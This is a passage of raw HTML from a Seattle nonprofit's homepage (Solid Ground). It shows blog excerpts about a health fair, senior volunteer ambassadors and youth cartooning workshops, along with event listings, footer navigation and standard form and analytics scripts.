data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="accident-action-adult-1332188" data-image-description data-medium-file="https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188-300x212.jpg" data-large-file="https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188.jpg"><noscript><img width="361" height="255" src="https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188-361x255.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Young person with sprained wrist gives a thumbs up." srcset="https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188-361x255.jpg 361w, https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188-300x212.jpg 300w, https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188-768x543.jpg 768w, https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188.jpg 801w" sizes="(max-width: 361px) 100vw, 361px" data-attachment-id="30537" data-permalink="https://www.solid-ground.org/closing-the-access-gap-to-healthcare-services/accident-action-adult-1332188/" data-orig-file="https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188.jpg" data-orig-size="801,566" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="accident-action-adult-1332188" data-image-description="" data-medium-file="https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188-300x212.jpg" data-large-file="https://s14621.pcdn.co/wp-content/uploads/2019/05/accident-action-adult-1332188.jpg" /></noscript> </div> </a> </div><div class="excerpt-container"> <div class="excerpt-text"><h5></h5> <h4 class="title blue"> <a href="https://www.solid-ground.org/closing-the-access-gap-to-healthcare-services/">Closing the access gap to healthcare services</a> </h4> <p class="excerpt-para">A recent health fair on Solid Ground&#8217;s Sand Point Housing residential campus in Magnuson Park had children and parents trickling in and out of the common area with I KNOW MY BODY stickers and goodie bags full of vitamins and hygiene products. The fair attracted the elderly and young alike with 10- and 14-year-olds excitedly preparing brightly colored salad bowls out of chard, beets, carrots, and toasted chickpeas. The ingredients and food prep tools were provided...</p> <div class="ellipsis"></div> </div> <p><a class="more" href="https://www.solid-ground.org/closing-the-access-gap-to-healthcare-services/">Read More <span aria-hidden="true">&raquo;</span><span class="screen-reader-text"> of Closing the access gap to healthcare services</span></a></p> </div></div><!--end panel body--> </div><!--end panel--> </div><!--end col4--><div class="col-md-4 col-sm-6 col-xs-12 hidden-xs"> <div class="panel panel-default green-bottom-border"> <div class="panel-body"><div class="featured-image"> <a href="https://www.solid-ground.org/rsvp-ambassadors-2019/" rel="bookmark"> <div class="img-container"><img src="https://s14621.pcdn.co/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566-361x255.jpg" width="361" height="255" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="2017 members of RSVP&#039;s community of Volunteer Ambassadors! (Photo by Liz Reed Hawk)" srcset="https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566-361x255.jpg 361w, https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566-300x212.jpg 300w, https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566-768x543.jpg 768w, https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566.jpg 801w" sizes="(max-width: 361px) 100vw, 361px" data-attachment-id="29165" data-permalink="https://www.solid-ground.org/ruminations-on-community/rsvp-volambassadors2017-801x566/" data-orig-file="https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566.jpg" data-orig-size="801,566" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.8&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DMC-FZ300&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1512999634&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.5&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.01&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="RSVP-VolAmbassadors2017-801&#215;566" data-image-description data-medium-file="https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566-300x212.jpg" data-large-file="https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566.jpg"><noscript><img width="361" height="255" src="https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566-361x255.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="2017 members of RSVP&#039;s community of Volunteer Ambassadors! (Photo by Liz Reed Hawk)" srcset="https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566-361x255.jpg 361w, https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566-300x212.jpg 300w, https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566-768x543.jpg 768w, https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566.jpg 801w" sizes="(max-width: 361px) 100vw, 361px" data-attachment-id="29165" data-permalink="https://www.solid-ground.org/ruminations-on-community/rsvp-volambassadors2017-801x566/" data-orig-file="https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566.jpg" data-orig-size="801,566" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.8&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DMC-FZ300&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1512999634&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.5&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.01&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="RSVP-VolAmbassadors2017-801&#215;566" data-image-description="" data-medium-file="https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566-300x212.jpg" data-large-file="https://s14621.pcdn.co/wp-content/uploads/2019/02/RSVP-VolAmbassadors2017-801x566.jpg" /></noscript> </div> </a> </div><div class="excerpt-container"> <div class="excerpt-text"><h5></h5> <h4 class="title blue"> <a href="https://www.solid-ground.org/rsvp-ambassadors-2019/">RSVP Ambassadors spread the word to spread change</a> </h4> <p class="excerpt-para">If you attended Solid Ground&#8217;s recent Building Community Luncheon, you were in the presence of RSVP Ambassadors &#8211; committed volunteers with our Retired and Senior Volunteer Program. Wearing their signature navy blue polo shirts and warm smiles, RSVP Ambassadors are more than seasoned volunteers for organizations they care about &#8211; they also enthusiastically spread the word about the benefits of volunteering later in life. On the heels of National Volunteer Month (April) and as we...</p> <div class="ellipsis"></div> </div> <p><a class="more" href="https://www.solid-ground.org/rsvp-ambassadors-2019/">Read More <span aria-hidden="true">&raquo;</span><span class="screen-reader-text"> of RSVP Ambassadors spread the word to spread change</span></a></p> </div></div><!--end panel body--> </div><!--end panel--> </div><!--end col4--><div class="col-md-4 col-sm-6 col-xs-12 hidden-xs hidden-sm"> <div class="panel panel-default green-bottom-border"> <div class="panel-body"><div class="featured-image"> <a href="https://www.solid-ground.org/naming-vulnerabilities-to-find-inner-strengths/" rel="bookmark"> <div class="img-container"><img src="https://s14621.pcdn.co/wp-content/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV-361x255.jpg" width="361" height="255" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Vishavjit Singh, the Sikh Captain America, poses with cartoon artists from Sand Point Housing, unleashing their inner superheroes!" srcset="https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV-361x255.jpg 361w, https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV-300x212.jpg 300w, https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV-768x543.jpg 768w, https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV.jpg 801w" sizes="(max-width: 361px) 100vw, 361px" data-attachment-id="30366" data-permalink="https://www.solid-ground.org/naming-vulnerabilities-to-find-inner-strengths/blogimage-superheroesunleash-gv/" data-orig-file="https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV.jpg" data-orig-size="801,566" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="BlogImage-SuperheroesUnleash-GV" data-image-description data-medium-file="https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV-300x212.jpg" data-large-file="https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV.jpg"><noscript><img width="361" height="255" src="https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV-361x255.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Vishavjit Singh, the Sikh Captain America, poses with cartoon artists from Sand Point Housing, unleashing their inner superheroes!" srcset="https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV-361x255.jpg 361w, https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV-300x212.jpg 300w, https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV-768x543.jpg 768w, https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV.jpg 801w" sizes="(max-width: 361px) 100vw, 361px" data-attachment-id="30366" data-permalink="https://www.solid-ground.org/naming-vulnerabilities-to-find-inner-strengths/blogimage-superheroesunleash-gv/" data-orig-file="https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV.jpg" data-orig-size="801,566" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="BlogImage-SuperheroesUnleash-GV" data-image-description="" data-medium-file="https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV-300x212.jpg" data-large-file="https://s14621.pcdn.co/wp-content/uploads/2019/04/BlogImage-SuperheroesUnleash-GV.jpg" /></noscript> </div> </a> </div><div class="excerpt-container"> <div class="excerpt-text"><h5></h5> <h4 class="title blue"> <a href="https://www.solid-ground.org/naming-vulnerabilities-to-find-inner-strengths/">Naming vulnerabilities to find inner strengths</a> </h4> <p class="excerpt-para">What’s YOUR superpower? Love? Compassion? Helping, housing, and feeding people? For 19 young artists from Sand Point Housing, these were just a few of the strengths tapped into during cartooning and storytelling workshops with cartoonist, activist, and educator Vishavjit Singh, Solid Ground’s 2019 Building Community Luncheon keynote speaker. At the first workshop, Vish, also known as the Sikh Captain America, shared his own personal journey with the youth – laying out his own vulnerabilities and...</p> <div class="ellipsis"></div> </div> <p><a class="more" href="https://www.solid-ground.org/naming-vulnerabilities-to-find-inner-strengths/">Read More <span aria-hidden="true">&raquo;</span><span class="screen-reader-text"> of Naming vulnerabilities to find inner strengths</span></a></p> </div></div><!--end panel body--> </div><!--end panel--> </div><!--end col4--></div></div><div class="row voffset-lrg"> <div class="col-md-12" class="see-all-button"> <a href="https://www.solid-ground.org/groundviews/"class="btn btn-white btn-lg">See All</a> </div> </div> </div> </div> <div class="container""> <div class="row voffset-lrg"> <div class="col-md-6" id="events-excerpts"> <div class="events-module-wrapper"> <h3>Upcoming Events</h3><div class="events-module"><div class="row event-row voffset-md"> <div class="col-xs-3 col-sm-2 date-column"><a href="https://www.solid-ground.org/events/homehelpers-5-16-19/" title="Calling Volunteer Home Helpers 55 &#038; Older!"> <div class="date-tab"> <div class="month">May </div> <div class="day">16</div> </div> </a></div><div class="col-xs-9 col-sm-10"><h4><a href="https://www.solid-ground.org/events/homehelpers-5-16-19/">Calling Volunteer Home Helpers 55 &#038; Older!</a></h4><p>We need YOU to help elder neighbors remain independent in their homes!<span>... </span><a class="more" href="https://www.solid-ground.org/events/homehelpers-5-16-19/">Read More&nbsp;&raquo;</a></p></div></div><hr></div><div class="events-module"><div class="row event-row voffset-md"> <div class="col-xs-3 col-sm-2 date-column"><a href="https://www.solid-ground.org/events/tour-del-supermercado-gratis/" title="¡Tour del Supermercado Gratis!"> <div class="date-tab"> <div class="month">May </div> <div class="day">29</div> </div> </a></div><div class="col-xs-9 col-sm-10"><h4><a href="https://www.solid-ground.org/events/tour-del-supermercado-gratis/">¡Tour del Supermercado Gratis!</a></h4><p>¿Quiere aprender a ahorrar dinero en el supermercado y comprar alimentos más<span>... </span><a class="more" href="https://www.solid-ground.org/events/tour-del-supermercado-gratis/">Read More&nbsp;&raquo;</a></p></div></div><hr></div><div class="events-module"><div class="row event-row voffset-md"> <div class="col-xs-3 col-sm-2 date-column"><a href="https://www.solid-ground.org/events/shop-smart-event-day/" title="Shop Smart Event Day"> <div class="date-tab"> <div class="month">May </div> <div class="day">29</div> </div> </a></div><div class="col-xs-9 col-sm-10"><h4><a href="https://www.solid-ground.org/events/shop-smart-event-day/">Shop Smart Event Day</a></h4><p>Want to learn how to save money at the grocery store and<span>... </span><a class="more" href="https://www.solid-ground.org/events/shop-smart-event-day/">Read More&nbsp;&raquo;</a></p></div></div><hr></div><div class="row"><div class="col-md-12 see-all"> <a alt="See All Events" href="https://www.solid-ground.org/get-involved/events/" class="btn btn-orange">See All</a> </div></div></div> </div> <div class="col-md-6"><div class="flexible-module-wrapper"> <div class="flexible-module"><h2>Thanks to All Superheroes!</h2><img src="https://s14621.pcdn.co/wp-content/uploads/2019/04/FeaturedEventModule-post-Luncheon2019.jpg" alt=""><p class="intro">Thanks to all of the superheroes who joined us at our 19th Annual Building Community Luncheon with keynote speaker Vishavjit Singh, the Sikh Captain America. Find and tag yourself in these super-power-fun-full pics from the event!</p><a class="btn-lg btn btn-white" href="https://www.facebook.com/pg/SolidGroundWA/photos/?tab=album&#038;album_id=10158614063999657">Facebook Photos</a></div> </div></div> </div> </div></div></div><div id="footer-wrap"> <footer> <div id="top-footer-wrap"> <div class="container"> <div class="row"> <div class="col-xs-12 visible-xs-block"> <div class="donate-why"><a title="Why?" class="why" href="https://www.solid-ground.org/donate/">Why?</a><a class="donate-button btn btn-blue" title="Donate" href="https://www.solid-ground.org/donate/#main-content-container">Donate &raquo;</a> </div> </div> </div> <div class="row"> <div class="col-lg-8 hidden-xs"> <div class="row"> <div class="col-sm-4"><div class="genesis-nav-menu"><ul id="menu-footer-get-help" class="list-unstyled"><li id="menu-item-97" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-97"><a title="Get Help" href="https://www.solid-ground.org/get-help/" itemprop="url">Get Help</a></li> <li id="menu-item-98" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-98"><a title="Housing Resources" href="https://www.solid-ground.org/get-help/housing/" itemprop="url">Housing Resources</a></li> <li id="menu-item-703" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-703"><a title="Food &#038; Nutrition" href="https://www.solid-ground.org/get-help/food-resources/" itemprop="url">Food &#038; Nutrition</a></li> <li id="menu-item-99" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-99"><a title="More Services" href="https://www.solid-ground.org/our-impact/more/" itemprop="url">More Impacts</a></li> <li id="menu-item-704" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-704"><a title="Transportation" href="https://www.solid-ground.org/get-help/transportation/" itemprop="url">Transportation</a></li> </ul></div></div> <div class="col-sm-4"><div class="genesis-nav-menu"><ul id="menu-footer-get-involved" class="list-unstyled"><li id="menu-item-103" class="heading menu-item menu-item-type-post_type menu-item-object-page menu-item-103"><a title="Get Involved" href="https://www.solid-ground.org/get-involved/" itemprop="url">Get Involved</a></li> <li id="menu-item-101" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-101"><a title="Ways to Give" href="https://www.solid-ground.org/donate/" itemprop="url">Ways to Give</a></li> <li id="menu-item-10171" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10171"><a title="Volunteer" href="https://www.solid-ground.org/get-involved/volunteer/" itemprop="url">Volunteer</a></li> <li id="menu-item-102" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-102"><a title="Attend Events" href="https://www.solid-ground.org/get-involved/events/" itemprop="url">Attend Events</a></li> <li id="menu-item-105" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-105"><a title="Take Action" href="https://www.solid-ground.org/get-involved/take-action/" itemprop="url">Take Action</a></li> <li id="menu-item-104" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-104"><a title="Careers" href="https://www.solid-ground.org/get-involved/careers/" itemprop="url">Careers</a></li> <li id="menu-item-386" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-386"><a title="Get News &#038; Updates" target="_blank" href="https://www.solid-ground.org/get-involved/get-news-updates/" itemprop="url">Get News &#038; Updates</a></li> </ul></div></div> <div class="col-sm-4"><div class="genesis-nav-menu"><ul id="menu-footer-our-impact" class="list-unstyled"><li id="menu-item-110" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-110"><a title="Our Impact" href="https://www.solid-ground.org/our-impact/" itemprop="url">Our Impact</a></li> <li id="menu-item-387" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-387"><a title="Race &#038; Social Justice" href="https://www.solid-ground.org/our-impact/race-social-justice/" itemprop="url">Race &#038; Social Justice</a></li> <li id="menu-item-107" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-107"><a title="Advocacy" href="https://www.solid-ground.org/our-impact/advocacy/" itemprop="url">Advocacy</a></li> <li id="menu-item-108" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-108"><a title="Housing &#038; Homelessness" href="https://www.solid-ground.org/get-help/housing/" itemprop="url">Housing &#038; Homelessness</a></li> <li id="menu-item-705" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-705"><a title="Hunger &#038; Nutrition" href="https://www.solid-ground.org/our-impact/hunger-nutrition/" itemprop="url">Hunger &#038; Nutrition</a></li> <li id="menu-item-10172" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10172"><a title="More Services" href="https://www.solid-ground.org/our-impact/more/" itemprop="url">More Impacts</a></li> <li id="menu-item-10173" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10173"><a title="Transportation" href="https://www.solid-ground.org/our-impact/transportation/" itemprop="url">Transportation</a></li> </ul></div> </div> </div> </div> <div class="col-lg-4"> <div class="row"> <div class="col-sm-6 col-lg-12 signup"> <h6 class="orange-title">Get Updates</h6> <div class='gf_browser_unknown gform_wrapper gf_simple_horizontal_wrapper' id='gform_wrapper_3' ><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_3' id='gform_3' class='gf_simple_horizontal' action='/'> <div class='gform_body'><ul id='gform_fields_3' class='gform_fields top_label form_sublabel_below description_below'><li id='field_3_1' class='gfield field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_3_1' >Enter your email address</label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_3_1' type='text' value='' class='small' placeholder='Enter your email address' aria-invalid="false" /> </div></li> </ul></div> <div class='gform_footer top_label'> <input type='submit' id='gform_submit_button_3' class='gform_button button' value='Subscribe' onclick='if(window["gf_submitting_3"]){return false;} window["gf_submitting_3"]=true; ' onkeypress='if( event.keyCode == 13 ){ if(window["gf_submitting_3"]){return false;} window["gf_submitting_3"]=true; jQuery("#gform_3").trigger("submit",[true]); }' /> <input type='hidden' name='gform_ajax' value='form_id=3&amp;title=&amp;description=&amp;tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_3' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='3' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_3' value='WyJbXSIsIjZlOTJiMjJiYTMyZDM0MTAxMTdhNTc2MTE2YjRiNWJmIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_3' id='gform_target_page_number_3' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_3' id='gform_source_page_number_3' value='1' /> <input type='hidden' name='gform_field_values' value='' /> </div> </form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_3' id='gform_ajax_frame_3'>This iframe contains the logic required to handle Ajax powered Gravity Forms.</iframe> <script type='text/javascript'>jQuery(document).ready(function($){gformInitSpinner( 3, 'https://s14621.pcdn.co/wp-content/plugins/gravityforms/images/spinner.gif' );jQuery('#gform_ajax_frame_3').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_3');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_3').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;if(is_form){jQuery('#gform_wrapper_3').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_3').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_3').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_3').val();gformInitSpinner( 3, 'https://s14621.pcdn.co/wp-content/plugins/gravityforms/images/spinner.gif' );jQuery(document).trigger('gform_page_loaded', [3, current_page]);window['gf_submitting_3'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_3').replaceWith(confirmation_content);jQuery(document).trigger('gform_confirmation_loaded', [3]);window['gf_submitting_3'] = false;}, 50);}else{jQuery('#gform_3').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [3, current_page]);} );} );</script><script type='text/javascript'> jQuery(document).bind('gform_post_render', function(event, formId, currentPage){if(formId == 3) {if(typeof Placeholders != 'undefined'){ Placeholders.enable(); }} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} );</script><script type='text/javascript'> jQuery(document).ready(function(){jQuery(document).trigger('gform_post_render', [3, 1]) } ); </script><ul class="list-unstyled address hidden-xs"><li><strong>Solid Ground</strong></li> <li>1501 N 45th Street, Seattle, WA 98103-6708</li><li>206.694.6700 | TTY: 7.1.1<li><a href="mailto:[email protected]">[email protected]</a></li><li>Hours: M-F, 8:30am - 5pm</li></ul> <ul class="list-unstyled social-buttons"> <li class="fb-icon"><a target="_blank" href="https://www.facebook.com/SolidGroundWA/"><span class="screen-reader-text">Solid Ground on Facebook</span></a></li> <li class="tw-icon"><a target="_blank" href="https://twitter.com/SolidGround"><span class="screen-reader-text">Solid Ground on Twitter</span></a></li> <li class="yt-icon"><a target="_blank" href="https://www.youtube.com/user/SolidGroundWA"><span class="screen-reader-text">Solid Ground on YouTube</span></a></li> <li class="li-icon"><a target="_blank" href="https://www.linkedin.com/company/solid-ground"><span class="screen-reader-text">Solid Ground on LinkedIn</span></a></li> <li class="ig-icon"><a target="_blank" href="https://www.instagram.com/solid_ground_wa"><span class="screen-reader-text">Solid Ground on Instagram</span></a></li> </ul> </div> <div class="col-sm-6 hidden-lg hidden-xs"> <div class="donate-why"><a title="Why?" class="why" href="https://www.solid-ground.org/donate//donate">Why?</a><a class="donate-button btn btn-blue" title="Donate &raquo;"https://www.solid-ground.org/donate/online-donation//donate" target="_blank">Donate &raquo;</a> </div> </div> </div> </div> </div> <div class="row"> <div class="col-xs-12 visible-lg-block" > <div class="donate-why"> <a title="Why?" class="why" href="https://www.solid-ground.org/donate/">Why?</a><a class="donate-button btn btn-blue" title="Donate" href="https://www.solid-ground.org/donate/online-donation/" target="_blank">Donate &raquo;</a> </div> </div> </div> </div> </div> <div id="bottom-footer-wrap"> <div class="container" id="sub-footer"><div class="row"> <div class="col-xs-3 col-md-2 voffset-lrg" > <div id="sponsor"> <p>Supported by:</p><a target="_blank" href="http://www.unitedwayofkingcounty.org/"><img src="https://s14621.pcdn.co/wp-content/themes/dist/tw-images/uwkc-bw.gif"></a> </div> </div> <div class="creds col-xs-9 col-md-10 voffset-lrg"> <div class="row"> <div class="col-md-12 hidden-xs"><div class="genesis-nav-menu"><ul id="menu-utility-nav-1" class="list-unstyled"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30"><a title="Groundviews Blog" href="https://www.solid-ground.org/groundviews/" itemprop="url">Groundviews Blog</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-307"><a href="https://www.solid-ground.org/get-involved/events/" itemprop="url">Events</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31"><a href="https://www.solid-ground.org/get-involved/careers/" itemprop="url">Careers</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21"><a href="https://www.solid-ground.org/contact/" itemprop="url">Contact</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20"><a href="https://www.solid-ground.org/about/" itemprop="url">About</a></li> </ul></div> </div> </div> <div class="row language"> <div class="col-md-12"> <p>Language interpretation & reasonable accommodations for disabilities made on request.</p> </div> </div> <div class="row disclaimer"> <div class="col-md-12"> <ul id="copyright" class="unstyled"> <li>Copyright 2007-2019 Solid Ground</li> <li>All rights reserved</li> <li><a href="https://www.solid-ground.org/privacy-policy/">Privacy Policy</a></li> </ul> <p>Content on this site reflects the thoughts/opinions of the writers, not necessarily Solid Ground.</p> </div> </div> </div> </div> </div> </div> </footer></div></div><!-- Custom Facebook Feed JS --> <script type="text/javascript"> var cfflinkhashtags = "false"; </script> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-N43G96S" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --><link rel='stylesheet' id='gforms_reset_css-css' href='https://s14621.pcdn.co/wp-content/plugins/gravityforms/css/formreset.min.css?ver=2.4.9' type='text/css' media='all' /> <link rel='stylesheet' id='gforms_formsmain_css-css' href='https://s14621.pcdn.co/wp-content/plugins/gravityforms/css/formsmain.min.css?ver=2.4.9' type='text/css' media='all' /> <link rel='stylesheet' id='gforms_ready_class_css-css' href='https://s14621.pcdn.co/wp-content/plugins/gravityforms/css/readyclass.min.css?ver=2.4.9' type='text/css' media='all' /> <link rel='stylesheet' id='gforms_browsers_css-css' href='https://s14621.pcdn.co/wp-content/plugins/gravityforms/css/browsers.min.css?ver=2.4.9' type='text/css' media='all' /> <script type='text/javascript' src='https://s14621.pcdn.co/wp-includes/js/underscore.min.js?ver=1.8.3'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-includes/js/backbone.min.js?ver=1.2.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpApiSettings = {"root":"https:\/\/www.solid-ground.org\/wp-json\/","nonce":"fbeb5c04a9","versionString":"wp\/v2\/"}; /* ]]> */ </script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-includes/js/api-request.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-includes/js/wp-api.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://s14621.pcdn.co/wp-content/plugins/custom-facebook-feed/js/cff-scripts.js?ver=2.9.1'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' 